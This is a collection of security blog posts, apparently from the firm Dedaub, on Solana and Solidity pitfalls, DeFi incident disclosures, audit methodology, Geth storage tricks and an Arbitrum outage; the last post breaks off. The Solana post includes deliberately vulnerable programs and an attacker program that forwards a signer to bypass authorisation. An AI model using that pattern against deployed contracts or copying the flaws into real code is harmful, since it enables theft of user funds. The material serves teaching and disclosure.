  • From Ethereum to Solana: How Developer Assumptions Can Introduce Critical Security Vulnerabilities

    From Ethereum to Solana: How Developer Assumptions Can Introduce Critical Security Vulnerabilities

     Ethereum Developers on Solana

    Solana stands out as one of the most popular blockchains, known for its high throughput and scalability that position it as an attractive alternative to Ethereum. These benefits arise from Solana’s distinctive architecture, which is markedly different from Ethereum’s design. While these architectural differences underlie many of Solana’s strengths, they also introduce unique risks that may be unfamiliar to developers transitioning from Ethereum. In this article, we will explore some common errors that Ethereum developers might make when building Solana programs, given the vastly different security models of the two platforms.

    Proper Account Validation

    State in Ethereum is tightly associated with the smart contract code that controls it. Each contract on Ethereum has a unique storage space that cannot be written to by any other contract. Solana takes a very different approach, separating executable code, called programs, from other types of accounts. This introduces an additional complexity, which can easily be overlooked by Ethereum developers: account validation.

    On Solana, users must provide all the accounts on which a program operates. This means that if the program does not enforce the appropriate constraints and validations, a malicious user may inject unexpected accounts, which could lead to critical vulnerabilities. Specifically, all accounts should be checked for correct ownership, correct type, correct address if a specific account is expected, and correct relations with other accounts expected by the program. All of these validations are made simpler using the Anchor framework. However, missed checks and validations are still possible even when leveraging these tools, especially when using remaining_accounts, on which Anchor imposes no checks. For example, consider the following snippet from a simple lending program:

    
    pub fn liquidate_collateral(ctx: Context<LiquidateCollateral>) -> Result<()> {
        let borrower = &mut ctx.accounts.borrower;
        let collateral = &mut ctx.accounts.collateral;
        let liquidator = &mut ctx.accounts.liquidator;
    
        let collateral_in_usd = get_value_in_usd(collateral.amount, collateral.mint);
        let borrowed_amount_in_usd = get_value_in_usd(borrower.borrowed_amount, borrower.mint);
    
        if collateral_in_usd * 100 < borrowed_amount_in_usd * 150 {
            withdraw_from(liquidator, borrower.borrowed_amount);
            transfer_collateral_to_liquidator(ctx);
            let liquidated_amount = collateral.amount;
    
            borrower.borrowed_amount = 0;
            msg!(
                "Liquidated {} collateral tokens due to insufficient collateralisation.",
                liquidated_amount
            );
        } else {
            msg!("Collateralisation ratio is sufficient; no liquidation performed.");
        }
        Ok(())
    }
    
    
    #[derive(Accounts)]
    pub struct LiquidateCollateral<'info> {
        #[account(mut)]
        pub borrower: Account<'info, BorrowerAccount>,
    
        #[account(mut)]
        pub collateral: Account<'info, TokenAccount>,
    
        #[account(mut)]
        pub liquidator: Account<'info, TokenAccount>,
    
        /// CHECK: signer PDA for collateral account
        pub collateral_signer: UncheckedAccount<'info>,
    
        pub token_program: Program<'info, Token>,
    }
    

    This function simply checks the collateralisation ratio of a loan and performs liquidation if the ratio is below 1.5. A similar program on Ethereum would likely store collateral data in a mapping, whether in the same contract or a different one. This would require the contract developer to explicitly specify a key for the mapping. However, on Solana, it is the user that chooses the account as opposed to the developer.

    Hence, while at first glance this may seem secure coming from Ethereum, the instruction handler is missing a crucial check. In-built Anchor checks ensure that all accounts are of the correct type and have the correct owner, however, there is no check that ensures the collateral account provided is associated with the borrower provided. This means an attacker could provide an arbitrary borrower account and the collateral account of a different borrower. This effectively allows the attacker to liquidate any collateral account, regardless of its collateralisation ratio, by finding (or creating) a borrower account that is just below the required ratio.

    This example demonstrates the dangers of insufficient account validation, especially transitioning from Ethereum development, where such validations do not exist. While Ethereum’s model tightly couples state with the source code, limiting potential interference from external actors, Solana’s separation of executable programs and accounts demands that developers take extra precautions. On Solana, every account passed into a program must be meticulously checked for proper ownership, type, and expected relationships.

    Signer Account Forwarding

    On Ethereum, authorisation is quite straightforward. The global variable msg.sender can be used to securely determine the immediate caller to the function, which is often enough to authorise privileged actions. On Solana, a similar approach can be employed, leveraging signer accounts.

    Signer accounts in Solana serve as the entities that have provided a valid signature for a transaction, confirming their intent and authority to perform an action. These accounts can either be traditional user keypairs, where a private key directly authorises actions, or Program Derived Addresses (PDAs). PDAs are account addresses deterministically generated from a set of seeds and a program ID. Unlike keypairs, PDAs do not have a private key. Only the program from which the PDA is defined can mark a PDA as a signer account using the invoke_signed function.

    Unlike msg.sender, a signer account does not securely determine the immediate caller. Programs in Solana are allowed to invoke other programs with the same signer accounts they themselves were invoked with, effectively forwarding signer accounts.

    Solana program can call other programs through CPI (Cross-Program Invocation). There are two ways to perform CPI: invoke and invoke_signed. As mentioned earlier, invoke_signed is used to mark a PDA account (which must be derived from the calling program) as a signer for the CPI. The invoke function on the other hand, does not add any signers. Both functions can forward signer accounts that are already marked as signers.

    Hence, when a user or program provides a signer account, they are essentially entrusting downstream programs with a piece of verified authority. The vulnerability emerges when this trust is misplaced. If an untrusted program is invoked with a signer account that possesses sensitive privileges, it can forward this signer with arbitrary arguments to exploit these privileges. For instance, an attacker might leverage this oversight to perform operations on behalf of an unsuspecting user.

    Programs are especially at risk when performing a signed CPI on a program that can be determined or influenced by the user. A malicious user may intentionally direct the CPI to a malicious program, effectively hijacking the signer account to impersonate the vulnerable program. The severity of the issue could be even further elevated if the CPI allows the user to specify remaining_accounts to increase the flexibility of the call. While this significantly increases the flexibility and composability of Solana programs for legitimate users, it also carries additional risks. An attacker exploiting insecure signature handling may be able to leverage these remaining_accounts to include any required additional accounts that are necessary to make a privileged call.

    Consider the below timelock program:

    /// Queue an arbitrary task with a specified delay.
    /// The caller provides the target program, instruction data (task_data), 
    /// and a delay (in seconds) that determines when the task can be executed.
    
    pub fn queue_task(
        ctx: Context<QueueTask>, 
        task_data: Vec<u8>, 
        target_program: Pubkey, 
        delay: i64
    ) -> ProgramResult {
    
        let task = &mut ctx.accounts.task;
    
        // Get the current unix timestamp
        let clock = Clock::get()?;
    
        task.release_time = clock.unix_timestamp + delay;  // set execution time to now + delay
        task.target_program = target_program; // target program to invoke on execute
        task.authority = *ctx.accounts.authority.key; // task creator stored for authorisation
    
        task.task_data = task_data; // arbitrary instruction data
    
        Ok(())
    }
    
    
    
    #[derive(Accounts)]
    pub struct QueueTask<'info> {
        #[account(
            init, 
            payer = authority, 
            space = 8 + Task::LEN,
        )]
    
        pub task: Account<'info, Task>,
    
        #[account(mut)]
        pub authority: Signer<'info>,
    
        pub system_program: Program<'info, System>,
    }

    This program allows anyone to queue a task with an arbitrary delay, storing the creator of the task for authorisation purposes. The program and arguments are controlled by the creator. Now consider this program’s execute function:

    /// Execute the queued task.
    /// Anyone can call this instruction, but the task will only execute if the timelock has expired.
    
    pub fn execute_task(ctx: Context<ExecuteTask>) -> ProgramResult {
        let task = &ctx.accounts.task;
    
        // Ensure the timelock has passed
        let clock = Clock::get()?;
        if clock.unix_timestamp < task.release_time {
            return Err(ErrorCode::TimelockNotExpired.into());
        }
    
        let cpi_accounts: Vec<AccountMeta> = 
            std::iter::once(&ctx.accounts.task_authority).chain(
            ctx
            .remaining_accounts
            .iter()
            ).map(|acc| AccountMeta {
                pubkey: *acc.key,
                is_signer: acc.is_signer,
                is_writable: acc.is_writable,
            })
            .collect();
    
        let ix = Instruction {
            program_id: task.target_program,
            accounts: cpi_accounts,
            data: task.task_data.clone(),
        };
    
        invoke_signed(&ix, ctx.remaining_accounts, &[&[TIMELOCK_SIGNER]])?;
        Ok(())
    }
    
    #[derive(Accounts)]
    pub struct ExecuteTask<'info> {
        #[account(mut, close = authority)]
        pub task: Account<'info, Task>,
    
        #[account(address = task.authority)]
        pub task_authority: AccountInfo<'info>,
    
        /// This is only needed to receive the lamports from the closing account.
        #[account(mut)]
        pub authority: Signer<'info>,
    
        #[account(
            seeds = [TIMELOCK_SIGNER],
            bump
        )]
        pub timelock_signer: UncheckedAccount<'info>,
    
        pub system_program: Program<'info, System>,
    }

    This execute function allows anyone to execute the task once the time has elapsed, with the original task creator being prepended to the accounts list for authorisation purposes. To an Ethereum developer, this may appear secure. However, under Solana’s security model, this program contains a critical error.

    The CPI in the execute_task function uses the same signer PDA for all tasks. This means a malicious task could misuse the signer to impersonate the timelock program. Suppose an attacker were to create the following program:

    #[program]
    pub mod malicious_program {
        use super::*;
        // This instruction forwards the signer account via CPI to the vulnerable program.
        // The vulnerable program then believes that the forwarded account legitimately signed.
        pub fn forward_signer(ctx: Context<ForwardSigner>) -> Result<()> {
            let accounts = vec![AccountMeta::new(ctx.accounts.user.key(), true)];
            let instruction_data: Vec<u8> = vec![]; // attacker controlled data
            let instruction = Instruction {
                program_id: ctx.accounts.target_program.key(),
                accounts,
                data: instruction_data,
            };
    
            invoke(&instruction, &[ctx.remaining_accounts])?;
            Ok(())
        }
    }
    
    #[derive(Accounts)]
    pub struct ForwardSigner<'info> {
        /// CHECK: This is the attacker's key as they created the malicious task
        pub ignored_task_creator: UncheckedAccount<'info>,
        /// CHECK: This is the target program's ID
        pub target_program: UncheckedAccount<'info>,
    }
    

    This program is designed to receive a CPI from the timelock program, strip away the task creator account that is intended for a vital security check and redirect the call (timelock signature intact) to a different program. If an unsuspecting program exposes a privileged function to the timelock, using the first account as authorisation, the attacker can exploit this. First, simply queue a task with minimal delay to this malicious program, then execute the task providing the target program, followed by the accounts list required for the target invocation. This CPI would be indistinguishable from a legitimate CPI from the timelock. Hence, the attacker can bypass the delay of any existing tasks in the timelock and potentially execute functions they are not authorised to execute.

    This example illustrates the dangers of misunderstanding Solana’s security model. In essence, mishandling signer accounts can transform a useful delegation mechanism into an exploitable backdoor, where an attacker could chain CPIs to bypass critical authorisation checks. The authority given to signer accounts should be carefully considered, and no single signer account should be used to authorise multiple actions.

    Ethereum Developers on Solana: Conclusion

    The transition from Ethereum to Solana requires certain security assumptions to be reconsidered. Inadequate account verification and unchecked signer account forwarding can open doors for exploitation. Developers must enforce strict ownership, type checks, relationship validations, and signer handling among accounts to mitigate risks. Embracing Solana’s distinct model calls for a careful and updated approach to program design, ensuring robust protection against vulnerabilities inherent in its architecture.


    Brought you by Dedaub, the home of the best EVM bytecode decompiler.

  • Bedrock vulnerability disclosure and actions

    Bedrock vulnerability disclosure and actions

    Bedrock vulnerability

    A few hours ago, the Dedaub team discovered a smart contract vulnerability in a number of uniBTC vault smart contracts in the Bedrock project. We disclosed the issue to the Bedrock account on Twitter and soon thereafter (after no response in 20 mins) to SEAL 911 for immediate investigation and action.

    A SEAL 911 war room, under the guidance of @pcaversaccio, was created and we frantically tried for two hours to reach Bedrock developers. At that time, blackhats exploited the vulnerability for a $1.8m loss. However, given that this was an infinite-mint vulnerability on the uniBTC token, it is perhaps fair to assess that the damage was contained. Most of the potential losses were averted by pausing third party protocols exposed to the at-risk funds, including Pendle and Corn. Notably, Pendle had over $30M of liquidity on the Corn network for the vulnerable asset. On Ethereum, the market cap of uniBTC was $75M, which an infinite mint renders worthless, and the asset was deployed in (at least) 8 networks.

    Root Cause

    The root cause of this vulnerability is a mismatched calculation of the exchange rate between Ethereum and Bitcoin, in one path of the minting logic. In turn, this allows anyone who deposits Ethereum to the vulnerable smart contract vault to mint uniBTC in equal amounts. (Up until the vulnerability, uniBTC could exit to Wrapped Bitcoin at 1-1 rates.) Since the price of Ethereum is many times lower than the price of BTC, this creates an instant profit for any attacker exploiting any of these vaults. The vulnerable vault contract was a permissioned minter for uniBTC, so infinite amounts could be minted. The only adjustment made during this minting function is appropriate scaling in the number decimals of the assets.

    In order to appreciate the gravity of this issue, we can illustrate this directly on the following code, straight from the vulnerable uniBTC vault smart contract (the implementation behind the proxy for the Vault):

    function mint() external payable {
        require(!paused[NATIVE_BTC], "SYS002");
        // Dedaub: adjust decimals and mint equal amount
        _mint(msg.sender, msg.value); 
    }

    Once the issue is exploited, the next step of a potential attacker would be to make use of this ill-gotten token on a number of other DeFi protocols, such as decentralized exchanges like Uniswap.

    Reporting the issue to Bedrock and exploitation

    As soon as our team had the issue, we contacted Bedrock on Twitter and entered a war room on SEAL 911.

    Initial X.com exchange (time in UTC+2).

    Unfortunately, even though we found the issue in the smart contract several hours before, by the time the team responded, the vulnerability had been exploited. The vulnerability could be discovered via shallow means (e.g., fuzzing bots) and the smart contract had only been deployed for under two days.

    Timeline prior to exploit:

    UTC 16:00 – issue discovered by Dedaub team and confirmed through simulation

    UTC 16:27 – issue reported to Bedrock team

    UTC 16:41 – war room on seal created on telegram

    UTC 18:28 – First exploit transaction on Ethereum

    The exploiter(s) subsequently minted large amounts of uniBTC and swapped them on a number of Uniswap and other AMM pools, stealing around $2M in funds directly. Note that the market cap of uniBTC on the Ethereum mainnet is $75M, which is the real potential loss for an infinite mint vulnerability.

    Notably, the vulnerable contract was deployed on (at least) 8 different chains. We are aware of Ethereum, Binance, Arbitrum, Optimism, Mantle, Mode, BOB, and ZetaChain.

    Averting Larger Losses

    In addition to a number of pools on Uniswap (and Pancakeswap on Binance), the largest holder of uniBTC was Pendle. Luckily through war room actions, the Pendle team disabled the uniBTC token on their platform. With the main exit liquidity gone, the Bedrock team reacted some hours later (with the main devs in a 2-5am timezone) to also pause the relevant vaults. 

    This article will be updated with more detail and context on the discovery (which happened as part of a challenge task during our company retreat) in the next days.

  • Rho Markets Incident

    Rho Markets Incident

    On July 19th, Rho Markets — a Compound V2 fork on Scroll — was involved in an incident that led to the creation of $7.5mil in bad debt. The root cause of the vulnerability was the misconfiguration of the oracle for ETH, i.e., setting the address to a wrong price feed, at initialization time, and not a bug in the code. The price mis-alignment was quickly exploited by an MEV bot that observed the opportunity.

    Fortunately, lost funds were returned due to the quick and coordinated efforts between the protocol team and SEAL 911 (of which we are also part). That being said, the willingness of the MEV Bot operator behind the incident to co-operate with the protocol and return the funds significantly sped up the recovery.

    One may also read Rho Markets’ official statement [tweet | blog] on the incident, which does a great job of explaining the circumstances that led to the loss of funds.

    Technical Details

    The misconfiguration

    Quoting Rho Markets’ incident report:

    This issue occurred due to the erroneous configuration of the ETH oracle price feed to the BTC price feed. Normally, such settings are validated before any changes are implemented. However, due to a human error in overseeing the deployment process, this validation check was missed in the case of the oracle price.

    The on-chain misconfiguration of the PriceOracleV2 contract occurred in this transaction: https://scrollscan.com/tx/0x9d2388a0c449c6265b968d86f0f54e75a5b82e2b04176e35eefdff5f135547ec#eventlog

    Rho Markets Incident

    As can be seen from the emitted event, the transaction has the effect of erroneously setting the oracle for the underlying asset at address(0) to be the WBTC/USD oracle.

    Rho Markets Incident

    At the time of the transaction, the configuration for the rWBTC token ( 0x1d7.. ) had not been set inside the oracle contract:

    Rho Markets Incident

    This is also evident by the fact that no calls to the PirceOracleV2‘s setRTokenConfig function had been performed, prior to the oracle update on block 7580111 and after rWBTC ’s deployment on block 7579842

    Rho Markets Incident

    The problem with setting the oracle for the asset at address(0) is that, as stated before, this address represents the underlying token of rETH (ETH) [ configuration of rETH ]

    Rho Markets Incident

    Which is a notion inherited from Compound’s semantics:

    Rho Markets Incident

    Screenshot depicting the configuration of ETH in Compound’s UniswapAnchoredView contract — the second address in the tuple is the underlying address

    The consequences of the misconfiguration

    At this point we can note that no contract code was vulnerable or broken, since the setter of the price oracle functioned as intended.

    However, this misconfiguration alone was enough to enable the arbitrage opportunity that an MEV bot exploited. Since all ETH collateral would be priced at the value of WBTC —a 20X increase in the actual value of ETH— this allowed the bot to borrow more funds than one should normally get when using ETH as collateral (which lead to the creation of bad debt).

    The MEV bot performed multiple transaction like this one: https://scrollscan.com/tx/0x0a7b4c6542eb8f37de788c8848324c0ae002919148a4426903b0fb4149f88f05

    Rho Markets Incident

    As one may see, the bot mints ~84 rETH

    Rho Markets Incident

    But it successfully manages to borrow ~942 wstETH which is then swapped into ETH

    The total amount of bad debt that was created by this method ended up being ~7.5 million.

    Return of funds

    The war room set up with the protocol team and SEAL 911 was quick in gathering information on the attack and the operator of the MEV bot. However, the bot operator acted in good will and contacted the protocol team for the return of funds:

    https://etherscan.io/tx/0xab7bc87fca7df222000b870fbe55750c33b3ea0461a8ba8a8ddbe530a1934248

    https://scrollscan.com/tx/0xd9c2e4f0364b13ada759f2dd56b65f5025e70cce4373e7c57ac31bf5226023e0

    Hello RHO team, our MEV bot have profited from your price oracle misconfiguration. We understand that the funds belong to users and are willing to fully return. But first we would like you to admit that it was not an exploit or a hack, but a misconfiguration on your end. Also, please provide what are you going to do to prevent it from happening again.

    Funds were successfully returned at: https://scrollscan.com/tx/0x15da6af0207d82d27ca20a542dae1b81580ca1cbfee7028c312229968e356446

    Takeaways

    The incident highlights the importance of rigorously reviewing deployment procedures. Even when there are no smart contract vulnerabilities, protocols must ensure that updates do not break any invariants posed by the protocol’s complex modules.

    We’d like to thank Rho Markets for their quick action and transparency on the issue, as well as all the members of SEAL 911 who also participated in the war room with us.

  • Web 3 Audit Methodology by Dedaub

    Web 3 Audit Methodology by Dedaub

     Web3 Audit Methodology

    Dedaub’s Security Audit teams comprise at least two senior security researchers, as well as any support they may need (e.g., cryptography expertise, financial modeling, testing) from the rest of our team. We carefully match the team’s expertise to your project’s specific nature and requirements. Our auditors conduct a meticulous, line-by-line review of every contract within the audit scope, ensuring that each researcher examines 100% of the code. There is no substitute for deep understanding of the code and forming a thorough mental model of its interactions and correctness assumptions.

    Web3 Audit Methodology | 4 Main Strategies

    Reaching this level of understanding is the goal of a Dedaub audit based on our Web3 audit methodology. To achieve this, we employ strategies such as:

    • Two-phase review: during phase A, the auditors understand the code in terms of functionality, i.e., in terms of legitimate use. During phase B, the auditors assume the role of attackers and attempt to subvert the system’s assumptions by abusing its flexibility.
    • Constant challenging between the two senior auditors: the two auditors will continuously challenge each other, trying to identify dark spots. An auditor who claims to have covered and to understand part of the code is often challenged to explain difficult elements to the other auditor.
    • Thinking at multiple levels: beyond thinking of adversarial scenarios in self-contained parts of the protocol, the auditors explicitly attempt to devise complex combinations of different parts that may result in unexpected behavior.
    • Use of advanced tools: every project is uploaded to the Dedaub Security Suite for analysis by over 70 static analysis algorithms, AI, and automated fuzzing. The auditors often also write and run manual tests on possible leads for issues. Before the conclusion of the audit, the development team gets access to the online system with our automated analyses, so they can see all the machine-generated warnings that the auditors also reviewed.

    Dedaub’s auditors also identify gas inefficiencies in your smart contracts and offer cost optimization recommendations. We thoroughly audit integrations with external protocols and dependencies, such as AMMs, lending platforms, and Oracle services, to ensure they align with their specifications.

  • Common Solidity Security Vulnerabilities

    Solidity Security Vulnerabilities

    Understanding and Mitigating Solidity Security Vulnerabilities

    Solidity Security Vulnerabilities are critical concerns for developers building smart contracts on the Ethereum blockchain and other EVM-compatible platforms. Solidity is the primary language for creating smart contracts on the Ethereum blockchain and other EVM-compatible platforms. It enables developers to build decentralized applications (DApps) that automate complex processes. However, blockchains’ immutability and decentralized nature make vulnerabilities in smart contracts especially critical. A single security flaw can result in the loss of millions of dollars in cryptocurrency, as demonstrated by numerous high-profile hacks.

    This guide looks at the most common Solidity security vulnerabilities.

    Access Control Failures

    One of the most common Solidity security vulnerabilities is the failure to protect sensitive external functions with an access control modifier. Usually, a contract will have some privileged functionality that should only be called by the contract’s owner, for instance, to configure some of its parameters. Failing to protect this with an access control modifier such as onlyOwner can lead to disastrous consequences, as any attacker will be able to modify the core behavior of the smart contract.

    Unchecked External Calls

    Unchecked external calls can introduce significant Solidity security vulnerabilities.

    Developers should control which contracts their application interacts with. Trusting arbitrary contracts and handing control to them means accepting malicious contracts could potentially interact with your application. This can lead to unintended behavior or even attacks.

    In general, developers should interact only with trusted contracts. If these contracts are unknown, they should implement a system that allows the contract owner to whitelist contracts on demand.

    Reentrancy Attacks

    Reentrancy is a notorious Solidity security vulnerability where an external contract can hijack the control flow of the target contract. These can occur when one of the smart contract’s external functions temporarily transfers control to another contract before continuing to execute its own state-modifying code. 

    If the other contract is malicious, it can call the external function again, making it re-execute the code before the transfer of control happens. This takes place without the external function having completed the execution of the original call beyond the transfer of the control point. The procedure is called a re-entry and can allow an attacker to change the state of the contract in an undesirable manner.

    Developers can prevent this kind of attack by using the checks-effects-interactions pattern. This pattern ensures that all state changes occur before transferring control to an external contract. Any re-entry attempt produces a fresh call, avoiding interaction with partially executed computations.

    Integer Overflow/Underflow

    Solidity uses integer data types for various calculations. Exceeding these data types’ maximum or minimum values can result in overflows or underflows. Solidity versions equal to or above 0.8.0 will revert automatically if this happens, and this can lead to unexpected reverts in your smart contracts. On the other hand, integer variables will wrap around if they are part of unchecked code, although this can lead to unexpected behavior unless there is a particular reason why overflow and underflow cannot occur.

    Out-of-Gas Situations

    Ethereum sets gas limits on transactions to prevent infinite loops and resource exhaustion. Smart contract developers must know these limits and gracefully handle out-of-gas situations.

    For example, a resource-intensive loop can cause a transaction to fail due to hitting the gas limit, which may result in a frustrating user experience.

    Sometimes, this situation can also lead to denial of service (DoS) attacks, where an attacker arbitrarily extends the length of the loop, effectively causing the functionality to become disabled.

    An example of this scenario would be a function that loops over all registered users and sends them some funds. An attacker could increase the length of this loop by registering many bogus accounts with this system. 

    In general, it is preferable to avoid nested loops and adopt a pull system in which individual users request an operation rather than a push system that performs the operation for all users.

    Oracle Staleness and Manipulation

    Some contracts interact with oracles, which make off-chain data available on the blockchain, such as a Chainlink price feed. Developers should perform basic sanity checks on the provided data when interacting with oracles. It’s essential, therefore, to have a backup plan if the oracle fails.

    For instance, contracts should always check that the data is not stale by checking the timestamp of the last data point is not further than a specified amount in the past. They should also check that the data is not an anomalous value such as zero or a negative number. In these cases, the contract should resort to a sensible default or pause the application until the feed starts reporting correct data again. 

    Developers should use only high-quality oracles to avoid some of the issues mentioned above. Some oracles, such as pricing data from an automated market maker (AMM), cannot be relied upon because they may suffer from value manipulation. Such manipulations will then have a ripple effect on your application as well.

    Conclusion: Solidity Security Vulnerabilities

    Solidity is a powerful language, but it’s easy to make mistakes that lead to severe vulnerabilities. These are only a tiny sample of the many vulnerabilities that can have a damaging effect on a smart contract. Therefore, before going live on the mainnet, it’s essential to audit your code. 

    You can also use tools like the Dedaub Security Suite to catch issues early. This tool helps you find and fix vulnerabilities in your smart contracts, giving you confidence in your code before deployment. Create your free account today at app.dedaub.com

  • Bulk Storage Extraction

    Bulk Storage Extraction

    Most Dapp developers have heard of and probably use the excellent Multicall contract to bundle their eth_calls and reduce latency for bulk ETL in their applications (we do too, we even have a python library for it: Manifold).

    Unfortunately, we cannot use this same trick when getting storage slots, as we discovered when developing our storage explorer, forcing developers to issue an eth_getStorageAt for each slot they want to query. Luckily, Geth has a trick up its sleeve, the “State Override Set”, which, with a little ingenuity, we can leverage to get bulk storage extraction.

    Bulk Storage Extraction | Geth Trickery

    The “state-override set” parameter of Geth’s eth_call implementation is a powerful but not very well-known feature. (The feature is also present in other Geth-based nodes, which form the base infrastructure for most EVM chains!) This feature enables transaction simulation over a modified blockchain state without any need for a local fork or other machinery!

    Using this, we can change the balance or nonce for any address, as well set the storage or the code for any contract. The latter modification is the important one here, as it allows us to replace the code at an address we want to query the storage for with our own contract that implements arbitrary storage lookups.

    Here is the detailed structure of state-override set entries:

    FIELDTYPEBYTESOPTIONALDESCRIPTION
    balanceQuantity<32YesFake balance to set for the account before executing the call.
    nonceQuantity<8YesFake nonce to set for the account before executing the call.
    codeBinaryanyYesFake EVM bytecode to inject into the account before executing the call.
    stateObjectanyYesFake key-value mapping to override all slots in the account storage before executing the call.
    stateDiffObjectanyYesFake key-value mapping to override individual slots in the account storage before executing the call.

    Bulk Storage Extraction | Contract Optimizoor

    The following handwritten smart contract has been optimized to maximize the number of storage slots we can read in a given transaction. Before diving into the results I’d like to take an aside to dive into this contract as it’s a good example of an optimized single-use contract, with some clever (or at least we think so) shortcuts.

    
    [00] PUSH0              # [0], initial loop counter is 0  
    [01] JUMPDEST  
    [02] DUP1               # [loop_counter, loop_counter]  
    [03] CALLDATASIZE       # [size, loop_counter, loop_counter]
    [04] EQ                 # [bool, loop_counter]  
    [05] PUSH1 0x13         # [0x13, bool, loop_counter]  
    [07] JUMPI              # [loop_counter]  
    [08] DUP1               # [loop_counter, loop_counter]  
    [09] CALLDATALOAD       # [, loop_counter]  
    [0a] SLOAD              # [, loop_counter]  
    [0b] DUP2               # [loop_counter, , loop_counter]  
    [0c] MSTORE             # [loop_counter]  
    [0d] PUSH1 0x20         # [0x20, loop_counter]  
    [0f] ADD                # [loop_counter] we added 32 to it, to move 1 word  
    [10] PUSH1 0x1          # [0x1, loop_counter]  
    [12] JUMP               # [loop_counter]  
    [13] JUMPDEST  
    [14] CALLDATASIZE       # [size]  
    [15] PUSH0              # [0, size]  
    [16] RETURN             # []
    

    To better understand what’s going on we can take a look at the high level code (this was actually generated by our decompiler)

    function function_selector() public payable {
    
        v0 = v1 = 0;
    
        while (msg.data.length != v0) {
            MEM[v0] = STORAGE[msg.data[v0]];
            v0 += 32;
        }
    
        return MEM[0: msg.data.length];
    }

    Walking through the code we can see that we loop through the calldata, reading each word, looking up the corresponding storage location, and writing the result into memory.

    The main optimizations are:

    • removing the need for a dispatch function
    • re-using the loop counter to track the memory position for writing results
    • removing abi-encoding by assuming that the input is a contiguous array of words (32-byte elements) and using calldatalength to calculate the number of elements

    If you think you can write a shorter or more optimized bytecode please submit a PR to storage-extractor and @ us on twitter.

    Bulk Storage Extraction | Results

    THEORETICAL RESULTS

    To calculate the maximum number of storage slots we can extract we need three equations, the execution cost (calculated as the constant cost plus the cost per iteration), the memory expansion cost $$(3x+(x^2/512))$$ and the calldata cost.

    We can break down the cost of the execution as follows:

    • The start, the range check and the exit will always run at least once
    • Each storage location will result in 1 range check and 1 lookup

    Calculating the calldata cost is slightly more complex as its variably-priced: empty (zero-byte) calldata is priced at 4 gas per byte and non-zero calldata is priced at 16 gas. Therefore we need to calculate a placeholder for the average price of a word (32-bytes).

    zero_byte_gas = 4
    non_zero_byte_gas = 16
    
    # We calculate this as the probability each bit of a byte is a 0
    prob_rand_byte_is_zero = (0.5**8) # 0.00390625
    prob_rand_byte_non_zero = 1 - prob_rand_byte_is_zero # 0.99609375
    
    avg_cost_byte = (non_zero_byte_gas * prob_rand_byte_non_zero) + \
    				(zero_byte_gas * prob_rand_byte_is_zero) # (16 * 0.99609375) + (04 * .00390625) = 15.953125

    Therefore the average word costs: $$15.953125 * 32 * x$$

    We can combine all of these equations and solve for the gas limit to get the maximum number of storage slots that can be read in one call.

    Therefore given a 50 million gas limit (which is the default for Geth) we can read an average of 18514 slots.

    This number will change based on the actual storage slots being accessed, with most users being able to access more. This is due to the fact that most storage variables are in the initial slots of the contract, with only mapping and dynamic arrays being pushed to random slots (or people using advanced storage layouts such as those used in Diamond proxies).

    PRACTICAL RESULTS

    To show the impact of this approach, we wrote a python script which queries a number of storage slots, first using normal RPC requests and batched RPC requests for the normal eth_getStorageAt, and then comparing to the optimized eth_call with state-override set. All the testing code can be found in the storage-extractor repo, along with the bytecode and results.

    To isolate variable latency as a concern, we ran the tests on the same machine as our node, with latency being re-added by utilizing asyncio.sleep to have a controlled testing environment. To properly understand the results, lets look at the best-case scenario of 200 concurrent connections.

    In order to properly represent the three methods we need to set the y-axis to be logarithmic since standard parallel `eth_getStorageAt`s are too slow. As you can see even with 200 connections standard RPC calls are 57 times slower than RPC batching and 103 times slower than `eth_call` with state-override.

    We can take a closer look at the difference between batching and call overrides in the next graph. As you can see, call overrides are faster in all scenarios since they require fewer connections, this is most noticeable with the graph in the top left which highlights the impact of latency on the overall duration.

    Conclusion

    To wrap up this Dedaub blog post, I’d like to thank the Geth developers for all the hard work they’ve been doing, and the extra thought they put into their RPC to enable us to do funky stuff like this to maximize the performance of our applications.

    If you have a cool use of the state-override set please tweet us, and, if you’d like to collaborate, you can submit a PR on the accompanying github repo (storage-extractor).

  • Arbitrum Sequencer Outage | Root Cause Analysis

    Arbitrum Sequencer Outage | Root Cause Analysis

    The Arbitrum network experienced significant downtime on December 15 due to problems with its sequencer and feed. The network had been down for almost three hours. The major outage began at 10:29 a.m. ET amid a substantial increase in a type of network traffic called Inscriptions. Arbitrum’s layer-2 network had processed over 22.29 million transactions and had a total value locked of $2.3 billion. Despite the success of the network, the current design suffers from a significant chokepoint when posting transactions to L1, causing the sequener to stall. While advancements such as Arbitrum Nova and Proto-danksharding might alleviate these design issues, this is not the first time Arbitrum has experienced such issues – a bug in the sequencer also halted the network in June 2023.

    Arbitrum Sequencer Outage | Background

    Arbitrum is a Layer-2 (L2) solution which settles transactions off the Ethereum mainnet. L2s provide lower gas fees and reduce congestion on the primary blockchain (In this case, Ethereum, L1). The current incarnation of Arbitrum is called Nitro. Arbitrum Nitro processes transactions in two stages: sequencing, where transactions are ordered and committed to this sequence, and deterministic execution, where each transaction undergoes a state transition function. Nitro combines Ethereum emulation software with extensions for cross-chain functionalities and uses an optimistic rollup protocol based on interactive fraud proofs. The Sequencer is a key component in the Nitro architecture. Its primary role is to order incoming transactions honestly, typically following a first-come, first-served policy. This is a centralized component operated by Offchain Labs. The Sequencer publishes its transaction order both as a real-time feed and to Ethereum, in the calldata of an “Inbox” smart contract. This publication ensures the final and authoritative transaction ordering. Additionally, a Delayed Inbox mechanism exists for L1 Ethereum contracts to submit transactions and as a backup for direct submission in case of Sequencer failure or censorship.

    Arbitrum Sequencer Outage | Root cause

    In the two hours prior to the outage more than 90% of Arbitrum traffic consisted of Ethscriptions. Ethscriptions are digital artifacts on EVM chains created using Ethereum calldata. Unlike traditional NFTs managed by smart contracts, Ethscriptions make the blockchain data itself a unique NFT. They are inspired by Bitcoin inscriptions (Ordinals) but function differently. Creating an Ethscription involves selecting an image, converting it to data URI format, then to hexadecimal format, and finally embedding it into a 0 ETH transaction’s Hex data field. Each Ethscription must be unique; duplicate data submissions are ignored. Owners can use Ethscriptions IDs for proof or transfer of ownership. In practice the calldata or Ethscriptions look like the code below:

    data: {"p":"fair-20","op":"mint","tick":"fair","amt":"1000"}

    Calldata example of an Ethscription. This represents a token mint.

    Since Ethscriptions are very cheap, one can do a lot of them for the same unit of cost. Indeed, a staggering 90% of transactions posted on-chain were Ethscriptions. Also, for a relatively low cost, the amount of transaction entropy that needed to be committed to L1 increased to 80MB/hr vs. the 3MB/hr that was typical before the traffic spike. We calculated this by looking at average on-chain transaction postings for the sequencer.

